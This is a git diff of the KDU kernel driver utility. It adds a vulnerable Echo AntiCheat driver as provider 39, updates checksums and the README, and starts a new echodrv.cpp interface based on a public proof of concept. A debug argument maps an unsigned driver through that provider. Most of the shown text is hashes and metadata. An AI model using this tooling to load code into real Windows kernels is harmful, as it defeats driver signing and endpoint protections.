diff --git a/KDU.sha256 b/KDU.sha256
index 68ee5bb..ffd7f29 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -24,7 +24,7 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\Example
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\Examples\DummyDrv2\dummy\r3request.c
82345231a904bfd01e64bb644a4132db93c34e2db7befc179ad4330176f63b85 *Source\Hamakaze\compress.cpp
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
-e8957d58c5e550a5e0f007883a564277c5a5cbc6b83af4b82bcbb30638997e63 *Source\Hamakaze\diag.cpp
+9da5d1ccaae7f77cbde2e2e38e87bc77f09885d028e8d2f6122bbe7a97b220d8 *Source\Hamakaze\diag.cpp
a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaze\diag.h
44ee49d7450a1fd8dd809889b4e6f3faa969c63343132514646ceb0b04c26642 *Source\Hamakaze\drvmap.cpp
c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h
@@ -33,10 +33,10 @@ bde58787437d8243d531f2ab1b33eda6bdf4afffdad08b63f85b16a3b65bd5fd *Source\Hamakaz
67605bff584d9fbe3cd34905f5efeb165626cb426668fedbb3e85b587cbdffa2 *Source\Hamakaze\global.h
ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
-32566d09a9183a32a3615f987eee2153f9d61b7ea7a95c752a0af0bdd669f1d3 *Source\Hamakaze\KDU.vcxproj
-2138d7f641038817debf4484c5b74d42ec4f90955d619d64425f8a42ab2bec77 *Source\Hamakaze\KDU.vcxproj.filters
-650f85bfda6b1653e2f0486182ca54ac6bd67517b8a52f886a54dffc8984ef8f *Source\Hamakaze\KDU.vcxproj.user
-d68453cf31b5faa408efd39f971f251d4f3460cefa868c8164bb635e25af4f75 *Source\Hamakaze\kduplist.h
+135eac610b9c6bcc3250a7582b7de249f5021b3735c32483a36d033051ae630b *Source\Hamakaze\KDU.vcxproj
+b7a8bb275c6eb15bf458e02c3475951135a277625d85ca05327bb20ce0171739 *Source\Hamakaze\KDU.vcxproj.filters
+fa203186e021c8a60c704ada486956bec7fc3bf3c288f4dde233f3b329c8a765 *Source\Hamakaze\KDU.vcxproj.user
+33ebd89284f2cbf7d36be664ef7d7bb3da677437dd3eaadca9212812cb3a6940 *Source\Hamakaze\kduplist.h
0d45b44d55d3986f8dfca4528c54597cfbc7b120166d9f3d526a22b530ff4480 *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
ef4d5f53395fd0350d9cc7a3a150e23da2b2e27e49bb8acde7c9f30dd9910eb1 *Source\Hamakaze\main.cpp
@@ -45,20 +45,21 @@ e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaz
eaeb06030f296d1147869dc65254a990425033b64e654f5d0e1c1408eebc2d93 *Source\Hamakaze\ps.cpp
eb15810b52b16482f3a3a679fbeed102257bfa0416243e74fce5b634daf9b074 *Source\Hamakaze\ps.h
6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
-b99493307cf038c5e4794a46a4c612f32278ba81be738f84945339535dbc91b5 *Source\Hamakaze\resource.rc
+767c570f7f51e767dbd1d2bd20f78b1bf4e5f5d2fdec62eb3491bc83b3c17034 *Source\Hamakaze\resource.rc
a6f3ec0bc0beb0ef152a2a33ca5cbd27bf538316ddf90545b31cd5a78114d6ec *Source\Hamakaze\shellcode.cpp
87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h
5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm
+1603ea48b3f1fb078066b0fd7bd2e41b6b40b3b97402c1ec1519328812e24686 *Source\Hamakaze\shellstager.lst
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
-7a0858c6079814599a1cd01cb7e8b868cbc09f0cd67c52fa28ffbb344314a487 *Source\Hamakaze\sup.cpp
-c9b10b4f9e02bd601c474e7045aabb130c6cbe684d350a1303f42d1d367ac7f5 *Source\Hamakaze\sup.h
+eaf61eac1600e8d19820b41726445e3d266310558466c82f5e95cdc5306bb067 *Source\Hamakaze\sup.cpp
+857116bea957a53b957d806319b9bbde2d21855e5f621082fa9b9add2bcbb7ff *Source\Hamakaze\sup.h
d19e67019fc5666a80a153991ec3d2ac3a7e8dbe088dd9ff93d3e0d0ced91cde *Source\Hamakaze\sym.cpp
292efaabf3f6223761aef1fc418ec98108fb529c7260d9d4a72715378c6b7547 *Source\Hamakaze\sym.h
-b3928fe0dac109a549e47d7a9a375293060268f07a1785a8c607205925fb4f5f *Source\Hamakaze\tests.cpp
+c04b7259548b8338d0b89d10b50b15fc6b3f7e4ddc64fe70b7b523c04f0ce82f *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
42c3ee977471fb2966d2abd804d1b69e6aeb6c5c86a02f9c75cf182b42af73c4 *Source\Hamakaze\victim.cpp
5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h
-5ae659dfb08d8942e05719f25f0207e31be58942a11997a124ae3d2e8dc08ecb *Source\Hamakaze\wdksup.h
+8e1aef4ae8919ef806bed30feb59ec532bff0b6dfd8237457a17022868bd40ec *Source\Hamakaze\wdksup.h
31860c95db21761086e2979753e981d6435f27435dead3ed7e4687e99bb878d4 *Source\Hamakaze\hde\hde64.c
fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h
9d37519623d404987300d3f3258148ba9adddfe1bed5f89a0e9e47646819c9c7 *Source\Hamakaze\hde\pstdint.h
@@ -75,6 +76,8 @@ bfee96a81ea2f722f426f878032b51d8793bf3d747505f8cd5e4ab5b49bccbbc *Source\Hamakaz
1d864cc688e8a2c38da6b94019f7efba771a0e0b7f68e1c3f8700b8caa76dda0 *Source\Hamakaze\idrv\dell.h
791a4d40f3f5076d0e6ed47e7db972f448ccc78ca578c35f11db637962c868a5 *Source\Hamakaze\idrv\directio64.cpp
73a97fa34df9c0733981536f2079d1eab89bfaf36b4c5d0003cb87d504764ec3 *Source\Hamakaze\idrv\directio64.h
+4eedec4502f7a58abcea69a8fd9be2a885c3ae013c7ddfe8b25e474ed12f36c3 *Source\Hamakaze\idrv\echodrv.cpp
+55756544736a87ddff4c82c18bb2efc49fab1d9d7e341b86a20f1fc23191652b *Source\Hamakaze\idrv\echodrv.h
e8d7c1c93512be4dd846d6c401c8135ae291354db99c926942176017db56bc91 *Source\Hamakaze\idrv\gmer.cpp
89d1cfb34afec23dbda6f40030a95386e9bbbc395666e2c0a3d066dc2fa8b0b8 *Source\Hamakaze\idrv\gmer.h
865bba446ad9f202f2bea58aec4cf48fa87448105dee2fb69caab37ec54f66e8 *Source\Hamakaze\idrv\hilscher.cpp
@@ -115,10 +118,10 @@ da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaz
103e3c46a148e415a80057caf102c837702983a67d6086482030becf3e429a72 *Source\Hamakaze\idrv\zodiacon.cpp
72be567129bf43464443801c169ebff5ea6fc276cdd6b0170044ffef974dffe1 *Source\Hamakaze\idrv\zodiacon.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
-91614e852fd6ba37e8bc26183abe3a767627de222bf97e82f038ce90a1c40f8e *Source\Hamakaze\res\SB_SMBUS_SDK.bin
-d8556d04891d9ae63ed5e82199092b6270b5dc5c47288d27cafd2b51a51bc729 *Source\Hamakaze\res\Taigei32.bin
+3b6d80c0cb2995fa87971bd2d6977a31f412b2ff1561509ce9da9714e235c83a *Source\Hamakaze\res\SB_SMBUS_SDK.bin
+5b9a2a1b4fda022a73a5830627954a5d3875caee9b6ef4923f62436e2e39a845 *Source\Hamakaze\res\Taigei32.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
-d79f132ea6c7e9557da34c66ab4f33c6acade8382f7e8203e32c783345e22e80 *Source\Shared\consts.h
+bf177b33eee674b3bf9a2c7fa71f5785115d04d51fa4c8fb51f0c653abdfb1f5 *Source\Shared\consts.h
1cbb3b9ac4c7a6f557ddad181348002d3dfa260be724378487c7efb321162ef8 *Source\Shared\kdubase.h
2ee707d0b1f83f7bfe85b0f2ed4b3046757db2e44db266fd80373877dd08562d *Source\Shared\ldr\ldr.cpp
37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h
@@ -144,9 +147,9 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
8acab5c8b8b339bdaf8e7b7d06f2cd6b10d24f889ef92462e4e53abbc5dc5341 *Source\Shared\ntos\halamd64.h
ffac2569a1dd61c400cda45839c7314bdd99cfcb5c17d503807db34c168628d2 *Source\Shared\ntos\ntalpc.h
1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca *Source\Shared\ntos\ntbuilds.h
-a0da4ef8f8a189d6f6350bade02342941d9f02cd948c2e35f77671e0d43a9b60 *Source\Shared\ntos\ntos.h
-d971e037b629849d999303778df77e465ef526a7e90eaea04f5983928a425ebe *Source\Shared\ntos\ntsup.c
-3242e68e746b316c1e9ab78a954b4936a7adce3a3da4c29b4afcb68763543e75 *Source\Shared\ntos\ntsup.h
+6f54d252d4d3deb5c8176ed3b064100e495fb03cc3a64d309bb752620d8a4400 *Source\Shared\ntos\ntos.h
+01452073d60208d99379d56ffd62c995edb19a105a959e2b42c03e5ce7fe7dd5 *Source\Shared\ntos\ntsup.c
+bd04b7beda7bf2f13bc7fcd2df205e35c41fbad96413efd1b33eda7d1ca5afc9 *Source\Shared\ntos\ntsup.h
261011d0ee9c2d2ee22dad2cdb45d66449b22b5a831fd60293f315c72968dd32 *Source\Shared\tinyaes\aes.c
a68264a684f0c19caf7f2464544d9e8163362cd919f382d08b82cbef0497a6f7 *Source\Shared\tinyaes\aes.h
541e81804b992865dcb3c7f1092b646a5c7d7dde93b83a7be489d4f452aac1bd *Source\Taigei\asio.cpp
@@ -161,57 +164,58 @@ b4c64ccefe575eda8a61b3b4cad52fcd8c2b345c7b9baf1c0c2ad9946bfc0168 *Source\Taigei\
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user
9e82ce97464b666dad14ffde32e5450a0974d1194ca68cd10e9b2611599dfc28 *Source\Tanikaze\export.def
5bbbcc6c275008ffdd765a3fa53ed3e4ae16ea51bf6ae66c2271f6f065ba0525 *Source\Tanikaze\main.cpp
-eced6f6c4a607820b9e023bbb11be8b3511d5a0da6919be67679aeae83e69b0c *Source\Tanikaze\resource.h
-6f1bfe79355e866863977bb2c8bd98b19ba50a5e3aa1d9a81a63a3f5febe19fd *Source\Tanikaze\resource.rc
-b92186ed89413d004353b24ebe0e7abb012e823708463878bb40ca1133946171 *Source\Tanikaze\tanikaze.h
-3c4fe6d30c91cb7eb9b919f8fafc91678d02acf5c45edff5fb30566906be4a24 *Source\Tanikaze\Tanikaze.vcxproj
-51947ebb359027a63a2a0c7a29a14faee9f4e9037982477f964afb10376fa078 *Source\Tanikaze\Tanikaze.vcxproj.filters
+de4c025cae61a8233d99b0cc98fb40fdf9e32cb3a0890a7b38d1727eb40919dd *Source\Tanikaze\resource.h
+1ee3e60679e67d8d5f01a2a348d884ab0f224dc4feda2633aef9327a35503941 *Source\Tanikaze\resource.rc
+f4a2b7ca469d7d31145605583d6d92bcafd640db4941f4f96704ddf3aede39b2 *Source\Tanikaze\tanikaze.h
+0b4e81bc9e1c1493c3d0cceb4ad9fe91ef7af287d0f8bd449ac71736f8e21770 *Source\Tanikaze\Tanikaze.vcxproj
+e70262e5800cfb19ac329cc566774f35315cc1f2e1b64329fa4089e785c382ee *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
-67034ee07c357dc82c9946389d60735f2bc1b3a0e13b4f5c739ba5178a76c27c *Source\Tanikaze\data\AsusCertService.bin
-47136911450d1da1851ff264503e0247bb1c9c1c2457ccb33ac3d458fe159aae *Source\Tanikaze\data\dbutilcat.bin
-3a5f6f40824548130c6c7c7b1969315d01fc58934acb41aa0b5b8664c4b4f66e *Source\Tanikaze\data\dbutilinf.bin
-7e82a859d6c8868db34d624b96cceab9f083beb9492efcddf23f64c47923ba71 *Source\Tanikaze\data\KMUEXE.bin
-a442fb71ed8b762b678656ae1b65b29f72c85e3ec4769082a946f7b72e1406d0 *Source\Tanikaze\data\KMUSIG.bin
-4050c510f1e4a23dc4e6fa2ba3ad24db2ec0ececd1059e99703601f8633c40f7 *Source\Tanikaze\drv\ALSysIO64.bin
-5da885ddffd338f4b4b73ba985a5fc29100d944b927663e9a7c890a176483090 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
-d135b1a1591dd4ed98cd30e8eb9ece782c0288a7aca3970d9c1ae73658ff4af9 *Source\Tanikaze\drv\amsdk.bin
-6da78e5ba96e7f99947bddec66901f673e6f1b2a097b2faa614135fada5a8f45 *Source\Tanikaze\drv\asio2.bin
-9e1a3369b34f5ea17af2ab6dcfa202143a0a66876e842c7b8933315187bb5bea *Source\Tanikaze\drv\AsIO3.bin
-6bdeaa758f1d0d1190ea44c947295b13cfcdda0c1b246872603f84edf32d1511 *Source\Tanikaze\drv\AsrDrv106.bin
-62da1832d11c607c5fc084be801fdfa2ba018fa25b6aa4347ea947d7a72b932c *Source\Tanikaze\drv\ATSZIO64.bin
-6b71600dec1e692346f072e97a36bfa609f2cdfd19884ec3a77776a13cec335a *Source\Tanikaze\drv\dbk64.bin
-d06a92ed4e46748195a44fc256efd333d50a2cb03274ae5c928eb5d7165cbaf6 *Source\Tanikaze\drv\DbUtil2_3.bin
-9de5ac6cd3b656c788356f25c9d273d90bcd28cc51beb077383d17c4066913be *Source\Tanikaze\drv\dbutildrv2.bin
-b3c03c58b831ec19e36905ae663f2399a8c3a73f8d44dbf0a8bdbf85bf6cb5d9 *Source\Tanikaze\drv\DirectIo64.bin
-c88b12ea45f176b2ea0380adb803fbd7fd6366f740e056f1c337bb7284f21f20 *Source\Tanikaze\drv\DirectIo64_2.bin
-854d85abccb257451c6fecf545851729ccf917dab26ba0111445a166e73481ad *Source\Tanikaze\drv\ene2.bin
-67995474c3d769ebe6ecc45e3e771f95a3b038276e4cf121079e94dfdf7319a4 *Source\Tanikaze\drv\EneIo64.bin
-516da7aedd204918046e19e59de2dcf7368a7a5c652153581d14125f4e16de1e *Source\Tanikaze\drv\EneTechIo64.bin
-2e94a7a81428e14b7a41b406ce2d1a447335f7e197cefbbe1ecefdafd42ab9a5 *Source\Tanikaze\drv\etdsupp.bin
-4535e9f79f940c6e5dfe0cdf64814462fbb8c7bdd0e9374a67e55979281d77df *Source\Tanikaze\drv\gdrv.bin
-d73c2f99841217ff59c00c385a59237ce359ba74e427f180d1a50ec3f9695308 *Source\Tanikaze\drv\GLCKIO2.bin
-d10329323a4ad49d6cb604345c60ef134b84d9f313350646584baf7d9cbf15ba *Source\Tanikaze\drv\gmerdrv.bin
-8462d57c08a2c056c2eb510c233a0480dfb0ce3745614ef2f82ab2c8819e5a36 *Source\Tanikaze\drv\heavenluo.bin
-c0c2f175df1e67457f475a5e544e3e520815cc23a2847eaffbc3260b1503caea *Source\Tanikaze\drv\HW64.bin
-a69febeed32057ea0588b13f8d80a4d1d6c20356bd10575f7db4ee3b447ae6d2 *Source\Tanikaze\drv\inpoutx64.bin
-cf4c4790b582dbc819c9f4ab32e42b67b4606c5d1e31392a70ae31fae0f0d4e6 *Source\Tanikaze\drv\iQVM64.bin
-fabed16b24a313943443ee4738d8ac263745160b9bf361a5e08006b764eded61 *Source\Tanikaze\drv\KExplore.bin
-001b2a9ddf541a945a7c1d6c8d2c23bc928ff06fd1ee4da7edc3df6986c771a0 *Source\Tanikaze\drv\KObjExp.bin
-46b04352250ebb95874ef18ec64fa31ea373ce90635680d299f8edb19cdfe845 *Source\Tanikaze\drv\kprocesshacker.bin
-4cf689502b2e47509f2d8eb4a33a9e271d88e26564a8b18fc3fefee7b7145966 *Source\Tanikaze\drv\KRegExp.bin
-559b56db6f3ba36116d3c6b1b2818775a488d0e8e0ed516753c56473c6102653 *Source\Tanikaze\drv\LDD.bin
-515a4bb03eddb2fb593e3504ec3f12c74639dc15b5fac3359e3bae3922751e4f *Source\Tanikaze\drv\lha.bin
-e604c513e4ba37129c89e971037ea2ef934531d41cc41c70f03159c5ee1474e0 *Source\Tanikaze\drv\mimidrv.bin
-9b63dca03a09f9d0c800e5d148178abc3f19eb949c78a6a61656132926d394aa *Source\Tanikaze\drv\MsIo64.bin
-e3b4040b72239735baf44cedc265ef2c3086d6cf700e36e3dcb6bc6363bf6667 *Source\Tanikaze\drv\pcdsrvc_x64.bin
-eaadbb1c692bc0fc7c49bc05596f764d3edafb0098eb13056d6cb19f4a0f3bff *Source\Tanikaze\drv\Phymemx64.bin
-c3467992e4e57d664a77b5a91b6ba408260350e4ee95604b00ca0abec2050112 *Source\Tanikaze\drv\physmem.bin
-82136994a4ebc411719dcf8b03827c50077a0f72507a52c370b4d36f830d2cd9 *Source\Tanikaze\drv\procexp1627.bin
-3174769519d1ef32c92a1eb3f34efa68c21fe4f083e316c34507dbab22e23576 *Source\Tanikaze\drv\procexp1702.bin
-46e639fb328967b05e5056cfa9da5ca4a8095b8a7628e2185c8f498624b9ac6d *Source\Tanikaze\drv\RTCore64.bin
-dd6498ed873d32ac715c8de6aef5001f8acf454685a7b1c05dac4462bf17892b *Source\Tanikaze\drv\rtkio64.bin
-cd24bdba7ebe4b9c65e54c03e9f1a56fdaf6151b0e5fc4937d6a74a3c7f22fb7 *Source\Tanikaze\drv\SysDrv3S.bin
-83867dc3e4f5d063556eba30e398fa745b8c987c3baa6b4bea073bdba62b3dc1 *Source\Tanikaze\drv\WinRing0x64.bin
+8a7f6fd335aa323219662adae60ea840f79c6e6d6729b78a3c7a013c75e29386 *Source\Tanikaze\data\AsusCertService.bin
+a243f30e136ec6d7604337ccc9593c720117a2dd900d303dd45000a7b8ffc28c *Source\Tanikaze\data\dbutilcat.bin
+48823ad796cb6124e0206392770663bd767bcafb670fcec9e7453b15efa274f8 *Source\Tanikaze\data\dbutilinf.bin
+be32d0caa6c5787cab3befa75605fec2b4ad0cd2f11cef541ff8472286b13528 *Source\Tanikaze\data\KMUEXE.bin
+9edc36cbbce234b940cc55964389d13679d19d978f641099035c369a5c0b7e47 *Source\Tanikaze\data\KMUSIG.bin
+84693e989595740c571d0558dd05d9e8c75cf6deaea4125c2f1ca126e09e7fff *Source\Tanikaze\drv\ALSysIO64.bin
+4779a3a5b5cb72bfb64209e36ffe49527d65a051e18a610b8ae4517092c75c19 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
+905c8ef4a183a6ad7d7b0cbcd4d89c3daecc4fc9afe179b47905b0cfe727b145 *Source\Tanikaze\drv\amsdk.bin
+36b4209818629e0b03f7d753acd16dd3f003bf6c4b9b8ea36b8d78cc6f2b9f0d *Source\Tanikaze\drv\asio2.bin
+3272183dcc93873b4f7d5a6bef65b6c6286130e14f717fa7d4e4cd16862fb671 *Source\Tanikaze\drv\AsIO3.bin
+84d7be67ff71c48670b1fc3c326ae867254c2df4c9887add0f7a6805d12e8574 *Source\Tanikaze\drv\AsrDrv106.bin
+9742fcd676b28b35e9da9318d14e92a22237f9a68b71b84e136a07c65f865450 *Source\Tanikaze\drv\ATSZIO64.bin
+e2aadcc91980deee6be43a66c7bce2d51cdc16290904edaa7f618f57074667fd *Source\Tanikaze\drv\dbk64.bin
+e946a33e9528d0d03aee48b866a306f1b49568602e33c83675facf13a8dc6eba *Source\Tanikaze\drv\DbUtil2_3.bin
+1524bce086b27573f518db6aea172c5bb1ff75e2ca7e4db7df83c1958dad2e56 *Source\Tanikaze\drv\dbutildrv2.bin
+c2872a80930c2a1ea1b7554e6fa373db42c96573fcdfbd3a02638a62c951c9ff *Source\Tanikaze\drv\DirectIo64.bin
+4b7cf3fe2bb2d7209a7eb69faa3e5666e42fc2ca4c8911e8e04fab06cd872170 *Source\Tanikaze\drv\DirectIo64_2.bin
+af466c66f929c0bc9bd8cd05cc15a2c623fc5d61546dfcb1e3136887409f3fc2 *Source\Tanikaze\drv\echo_driver.bin
+16e326f15c466c75a405c397ab37cde52c54341871d0b54d58e0d07442508857 *Source\Tanikaze\drv\ene2.bin
+292845e884fb5919b552b9e553710018809e73355371d62bcb343f33b8c0c83d *Source\Tanikaze\drv\EneIo64.bin
+972e6b5b86186354fa17c57400a58b9b8a3781570a604d36fe7f065740c139bb *Source\Tanikaze\drv\EneTechIo64.bin
+1bc9bb5ef92076f8b38f07e1bcf210525707e50c92fe018e21b4039cd3d7168c *Source\Tanikaze\drv\etdsupp.bin
+889f00d4152d58af3047e337542681bd9b254e2214edee43269aacf6dd3d9643 *Source\Tanikaze\drv\gdrv.bin
+1073a1ec036d1d36812bdb9af5157e484c8401cf71900dbdc09a8686957c25a5 *Source\Tanikaze\drv\GLCKIO2.bin
+3f02d0acb86cf90d8301d7a9da8f71baf51852d8b9aab09dcca87982393d97d6 *Source\Tanikaze\drv\gmerdrv.bin
+1803242bd8a2084e8ce003fc9376e6605ef5141f3a2225081a1af2f328931d9f *Source\Tanikaze\drv\heavenluo.bin
+74d69aebb1501410e1c1d247f10892a54bed7acb94c9ce0242cb5cc50596d10f *Source\Tanikaze\drv\HW64.bin
+2f46dd6155355cba5d61cc1cb5d8823e56a221edc46bb99d225ae8fc7e8bb19a *Source\Tanikaze\drv\inpoutx64.bin
+bb15d26ae54fce4ea62b2d012bf28c3183be9d5758c086202a7bb9b9ea7ae8a9 *Source\Tanikaze\drv\iQVM64.bin
+44fed5b2449bb93fd1dfbfa89fd985f1c16694091df631c68240fdf9990aaaf2 *Source\Tanikaze\drv\KExplore.bin
+331761b7ea8af614b5d27f0e61c075f5cfdd9948d967e9fb8408c2dfe6413ced *Source\Tanikaze\drv\KObjExp.bin
+d7cc966e0356c4cccf21f3b65096e4c2f2a31d7e0b356f112d15cebcc84ad8ce *Source\Tanikaze\drv\kprocesshacker.bin
+7b077b8e8f867289815aa0590d455b0c8da72384e8340b5bf90ca18fbe566e42 *Source\Tanikaze\drv\KRegExp.bin
+cc8c72b5f80045a5bd11b921095dd89c58d411a28ec8496813d115c09b01d8b4 *Source\Tanikaze\drv\LDD.bin
+d6617af4b83bba4610258a6cc6976a867a74cff01980942dcc199d1983fc6729 *Source\Tanikaze\drv\lha.bin
+d49f72a8e4e25c3b13b7ef4afb319807f5ac73ab9760a950db19f68622d2108e *Source\Tanikaze\drv\mimidrv.bin
+d1ed748580d124269afe8fb3814753dcf354bb2cf7050a421fc4932b2d1ab8c7 *Source\Tanikaze\drv\MsIo64.bin
+510a426a390fdea43128d1f1d25c822562b310aa59624f89f60e8fada0678e4c *Source\Tanikaze\drv\pcdsrvc_x64.bin
+995560be3a37a7979b9582ebd833d6cf016a256421519a328c0069a76a7ae762 *Source\Tanikaze\drv\Phymemx64.bin
+8b29097ff0c0d9bffede5f3571a39c6f8b90394acfefb42f9665e96da3fde3b2 *Source\Tanikaze\drv\physmem.bin
+0d7752c8093188333d0496f6c1d60f46f2407a6d546c5737c76699394f1e5de5 *Source\Tanikaze\drv\procexp1627.bin
+e827525e93708201d88600bb13ed4b9444c4eb18afff383c7e484be0eacad170 *Source\Tanikaze\drv\procexp1702.bin
+e48381b231038b398ab42ac69b147f5b51f68a76bff8aa2b0ace6b5d66ee50fc *Source\Tanikaze\drv\RTCore64.bin
+218c86461863c166f12d9c08e40dc7ed847488fc0127db4dbfd1e589b8c5ab8f *Source\Tanikaze\drv\rtkio64.bin
+5c1ccdfe2b401d5162b114590c689f06e739ec2c0a35a8ed9599b5eeea3d5314 *Source\Tanikaze\drv\SysDrv3S.bin
+bbf8656bd4cf0d65a7bf38bb6e5fb9edc7faf25e010ad643f434f3377f82e72e *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
diff --git a/README.md b/README.md
index 33d0d9c..5806a33 100644
--- a/README.md
+++ b/README.md
@@ -143,6 +143,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 36 | Pavel Yosifovich | KExplore | Kernel Explorer | Original | Undefined | |
| 37 | Pavel Yosifovich | KObjExp | Kernel Object Explorer | Original | Undefined | |
| 38 | Pavel Yosifovich | KRegExp | Kernel Registry Explorer | Original | Undefined | |
+| 39 | Inspect Element LTD | EchoDrv | Echo AntiCheat (spyware) | Original | Undefined | |
###### *At commit time, data maybe inaccurate.
@@ -207,6 +208,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
* How to exploit a vulnerable windows driver, https://github.com/stong/CVE-2020-15368
* CVE-2022-3699, https://github.com/alfarom256/CVE-2022-3699
* LOLDrivers, https://www.loldrivers.io
+* ECHOH NO, https://github.com/kite03/echoac-poc/
# Wormhole drivers code
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index 7b09964..211af83 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -140,6 +140,7 @@
+
@@ -193,6 +194,7 @@
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index 083a4db..0480bb1 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -198,6 +198,9 @@
Source Files\idrv
+
+ Source Files\idrv
+
@@ -371,6 +374,9 @@
Source Files\idrv
+
+ Source Files\idrv
+
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index 1f5d692..859a613 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -5,7 +5,7 @@
WindowsLocalDebugger
- -list
+ -prv 39 -map c:\install\dummy.sys
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/diag.cpp b/Source/Hamakaze/diag.cpp
index 64502c2..d24e449 100644
--- a/Source/Hamakaze/diag.cpp
+++ b/Source/Hamakaze/diag.cpp
@@ -4,9 +4,9 @@
*
* TITLE: DIAG.CPP
*
-* VERSION: 1.31
+* VERSION: 1.33
*
-* DATE: 09 Apr 2023
+* DATE: 16 Jul 2023
*
* Hamakaze system diagnostics component.
*
@@ -649,7 +649,7 @@ VOID KDUBacktraceByHandle(
UNICODE_STRING usLsass;
union {
- PSYSTEM_PROCESSES_INFORMATION Processes;
+ PSYSTEM_PROCESS_INFORMATION Process;
PBYTE ListRef;
} List;
@@ -688,13 +688,13 @@ VOID KDUBacktraceByHandle(
do {
List.ListRef += nextEntryDelta;
- if (RtlEqualUnicodeString(&usLsass, &List.Processes->ImageName, TRUE)) {
- cid.UniqueProcess = List.Processes->UniqueProcessId;
+ if (RtlEqualUnicodeString(&usLsass, &List.Process->ImageName, TRUE)) {
+ cid.UniqueProcess = List.Process->UniqueProcessId;
TracePsHandle(&cid, SystemRangeStart, pvModules, FALSE);
break;
}
- nextEntryDelta = List.Processes->NextEntryDelta;
+ nextEntryDelta = List.Process->NextEntryDelta;
} while (nextEntryDelta);
diff --git a/Source/Hamakaze/idrv/echodrv.cpp b/Source/Hamakaze/idrv/echodrv.cpp
new file mode 100644
index 0000000..b69291f
--- /dev/null
+++ b/Source/Hamakaze/idrv/echodrv.cpp
@@ -0,0 +1,192 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: ECHODRV.CPP
+*
+* VERSION: 1.33
+*
+* DATE: 16 Jul 2023
+*
+* Inspect Element LTD spyware (anticheat) driver interface.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+//
+// Based on https://github.com/kite03/echoac-poc/tree/main/PoC
+//
+
+#include "global.h"
+#include "idrv/echodrv.h"
+
+HANDLE gEchoDrvClientHandle = NULL;
+
+/*
